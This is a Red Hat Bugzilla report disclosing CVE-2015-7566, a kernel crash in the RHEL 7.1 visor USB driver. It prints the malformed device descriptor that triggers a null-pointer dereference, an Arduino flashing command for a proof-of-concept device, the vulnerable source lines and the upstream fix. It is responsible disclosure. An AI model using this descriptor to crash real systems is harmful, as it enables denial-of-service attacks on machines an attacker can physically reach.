Bug 1283371 - CVE-2015-7566 Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid USB device descriptors (visor driver) [local-DoS]
Summary: CVE-2015-7566 Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on ...
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: kernel
Version: 7.1
Hardware: Unspecified
OS: Unspecified
unspecified
high
Target Milestone: rc
: ---
Assignee: Petr Matousek
QA Contact: Mike Gahagan
URL:
Whiteboard:
Depends On:
Blocks: 1296180 CVE-2015-7566
TreeView+ depends on / blocked
 
Reported: 2015-11-18 20:14 UTC by Ralf Spenneberg
Modified: 2016-05-11 15:32 UTC (History)
3 users (show)

Fixed In Version:
Doc Type: Release Note
Doc Text:
Clone Of:
Environment:
Last Closed: 2016-03-11 13:51:13 UTC


Attachments (Terms of Use)
vUSBf Payload (192 bytes, text/plain)
2015-11-18 20:16 UTC, Ralf Spenneberg
no flags Details
Stacktrace (5.00 KB, text/plain)
2015-11-18 20:19 UTC, Ralf Spenneberg
no flags Details
vUSBf Payload (16.68 KB, text/plain)
2015-11-18 20:19 UTC, Ralf Spenneberg
no flags Details

Description Ralf Spenneberg 2015-11-18 20:14:59 UTC
Description of problem:

Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (visor driver) [local-DoS]


Version-Release number of selected component (if applicable):
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 

How reproducible:
always


OpenSource Security Ralf Spenneberg
Am Bahnhof 3-5
48565 Steinfurt
info@os-s.net


Date: November 12th, 2015
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 
Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (visor driver) [local-DoS]
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 
(for debugging-purposes we used the CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)


Abstract
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB 
device which requires the visor driver.
Detailed product description
We confirmed the bug on the following system:
RHEL 7.1
Kernel = 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes 

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

 ######### PAYLOAD 1 #########
[*] Device-Descriptor
  bLength:		0x12
  bDescriptorType:	0x1
  bcdUSB:		0x200
  bDeviceClass:		0x3
  bDeviceSubClass:	0x0
  bDeviceProtocol:	0x0
  bMaxPacketSize:	0x40
  idVendor:		0x54c
  idProduct:		0x144
  bcdDevice:		0x100
  iManufacturer:	0x1
  iProduct:		0x2
  iSerialNumbers:	0x3
  bNumConfigurations:	0x1

The clie_5_attach function of the visor driver, which is called during the driver initialization process, expects an OUT-Bulk-Endpoint. 
Due to an incomplete sanity check, the visor driver tries to dereference null-pointers. 
This results in a crash of the system. 

****
$ nm visor.ko.debug | grep clie_5_attach
0000000000000030 t clie_5_attach
$ addr2line -e visor.ko.debug 6d
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/drivers/usb/serial/visor.c:610
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)
        ...
607
608	pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);
609	for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)
610		port->write_urbs[j]->pipe = pipe;  /* if there is no configured OUT-bulk-endpoint, the kernel tries to dereference null-pointers */
611
612	return 0;
613 }
        ...
****

	[*] Configuration-Descriptor
	  bLength:		0x9
	  bDescriptorType:	0x2
	  wTotalLength:		0x27
	  bNumInterfaces:	0x1
	  bConfigurationValue:	0x1
	  iConfiguration:	0x0
	  bmAttributes:		0x0
	  bMaxPower:		0x31
		[*] Interface-Descriptor
		  bLength:		0x9
		  bDescriptorType:	0x4
		  bInterfaceNumber:	0x0
		  bAlternateSetting:	0x0
		  bNumEndpoints:	0x3
		  bInterfaceClass:	0x0
		  bInterfaceSubClass:	0x0
		  bInterfaceProtocol:	0x0
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x81  <-- IN-Direction
			  bmAttribut:		0x1   <-- Interrupt-Transfer
			  wMaxPacketSize:	0x404
			  bInterval:		0xc
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x1   <-- OUT-Direction
			  bmAttribut:		0x1   <-- Interrupt-Transfer (change this value to 0x2, which is the value for bulk-transfer without additional features, and the visor driver won't crash)
			  wMaxPacketSize:	0x4
			  bInterval:		0xc
			[*] Endpoint-Descriptor
			  bLength:		0x7
			  bDescriptorType:	0x5
			  bEndpointAddress:	0x82  <-- IN-Direction
			  bmAttribut:		0x1   <-- Interrupt-Transfer
			  wMaxPacketSize:	0x4
			  bInterval:		0xc

Proof of Concept:
1) The bug can be reproduced using USB-fuzzing framework vUSBf from Sergej Schumilo (github.com/schumilo). 
The attached vUSBf-obj file contains the payload. Please let us know if you would like to use the Facedancer board. 
In such case, we could also provide a patched version of vUSBf which allows to reproduce vUSBf-Payloads using the Facedancer board.
2) For a proof of concept we are providing also an Arduino firmware file. Just flash it 
on Arduino Leonardo and plug it into any RHEL machine. The Arduino will 
emulate the defective USB device.

   avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex

The file binary.hex has been attached to this bug report.
To prevent automated sending of payloads, use a jumper to connect port D3 and 
5V!


Severity and Ease of Exploitation
The security weakness can be easily exploited. Using our Arduino firmware only 
physical access to the system is required. 


Additional info:
Stacktrace, vUSBf-Payload, Arduino-Firmware attached.


Please assign a CVE for this issue since this is a local DoS of the targeted system. 
CVSS 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Comment 1 Ralf Spenneberg 2015-11-18 20:16:00 UTC
Created attachment 1096273 [details]
vUSBf Payload

Comment 2 Ralf Spenneberg 2015-11-18 20:19:14 UTC
Created attachment 1096276 [details]
Stacktrace

Comment 3 Ralf Spenneberg 2015-11-18 20:19:56 UTC
Created attachment 1096277 [details]
vUSBf Payload

Comment 6 Mike Gahagan 2016-01-26 19:55:04 UTC
Setting QA ack+, will probably have to rely on code review for this one, but will see if I can come up with a test case for it.

Comment 7 Vladis Dronov 2016-02-28 16:24:30 UTC
this was fixed in the upstream commit cb3232138e37129e88240a98a1d2aba2187ff57c by adding endpoints number check required:

[ http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cb3232138e37129e88240a98a1d2aba2187ff57c ]
+	if (serial->num_bulk_out < 2) {
+		dev_err(&serial->interface->dev, "missing bulk out endpoints\n");
+		return -ENODEV;
+	}

Comment 8 Vladis Dronov 2016-03-11 13:48:57 UTC
Thank you for reporting this flaw.

The Product Security has rated this flaw as having low security impact (bz#1296466), so the patch currently is not planned to be added to the RHEL source trees. The upstream and Fedora patches are completed (at least, I hope so), so the patch may get to the RHEL trees at the next USB subsystem code rebase.


Note You need to log in before you can comment on or make changes to this bug.